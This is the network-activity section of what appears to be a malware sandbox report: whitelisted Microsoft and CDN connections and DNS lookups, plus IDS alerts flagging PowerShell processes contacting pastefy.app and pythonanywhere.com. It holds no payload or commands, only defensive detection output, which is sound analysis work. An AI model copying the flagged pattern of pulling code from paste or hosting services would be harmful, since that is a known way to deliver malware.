5.74 Kb
whitelisted
GET
200
23.11.41.157:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAjTxtAB8my1oj8MfWpz%2F7Y%3D
NL
binary
313 b
whitelisted
5392
svchost.exe
GET
200
2.16.164.49:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
NL
binary
825 b
whitelisted

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
Not routed
whitelisted
5392
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
5276
MoUsoCoreWorker.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
92.123.104.38:443
www.bing.com
AKAMAI-ASN1
NL
whitelisted
48.192.1.65:443
activation-v2.sls.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
23.11.41.157:80
ocsp.digicert.com
AKAMAI-AMS
NL
whitelisted
204.79.197.203:80
oneocsp.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
4
System
192.168.100.255:138
Not routed
whitelisted
5392
svchost.exe
2.16.164.49:80
crl.microsoft.com
AKAMAI-ASN1
NL
whitelisted
5392
svchost.exe
23.52.181.212:80
www.microsoft.com
AKAMAI-AS
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
  • 40.127.240.158
whitelisted
www.bing.com
  • 92.123.104.38
  • 92.123.104.34
  • 92.123.104.63
  • 92.123.104.31
  • 92.123.104.32
whitelisted
activation-v2.sls.microsoft.com
  • 48.192.1.65
whitelisted
ocsp.digicert.com
  • 23.11.41.157
whitelisted
oneocsp.microsoft.com
  • 204.79.197.203
whitelisted
google.com
  • 142.250.154.102
  • 142.250.154.139
  • 142.250.154.100
  • 142.250.154.101
  • 142.250.154.113
  • 142.250.154.138
whitelisted
crl.microsoft.com
  • 2.16.164.49
  • 2.16.164.120
whitelisted
www.microsoft.com
  • 23.52.181.212
  • 88.221.169.152
whitelisted
gitlab.com
  • 172.65.251.78
whitelisted
www.python.org
  • 151.101.0.223
  • 151.101.128.223
  • 151.101.64.223
  • 151.101.192.223
whitelisted

Threats

PID
Process
Class
Message
5392
svchost.exe
Unknown Traffic
ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW)
7408
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
1312
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
2232
svchost.exe
Misc activity
ET INFO Pastebin-like Service Domain in DNS Lookup (pastefy .app)
1312
powershell.exe
Misc activity
ET INFO Observed Pastebin-like Service (pastefy .app) in TLS SNI
1312
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
2232
svchost.exe
Misc activity
ET INFO Cloud IDE/Code Hosting Domain in DNS Lookup (pythonanywhere .com)
7724
powershell.exe
Misc activity
ET INFO Observed Cloud IDE/Code Hosting Domain (pythonanywhere .com) in TLS SNI
1312
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
7724
powershell.exe
Misc activity
ET INFO Observed HTTP Request to *.pythonanywhere .com Domain
No debug info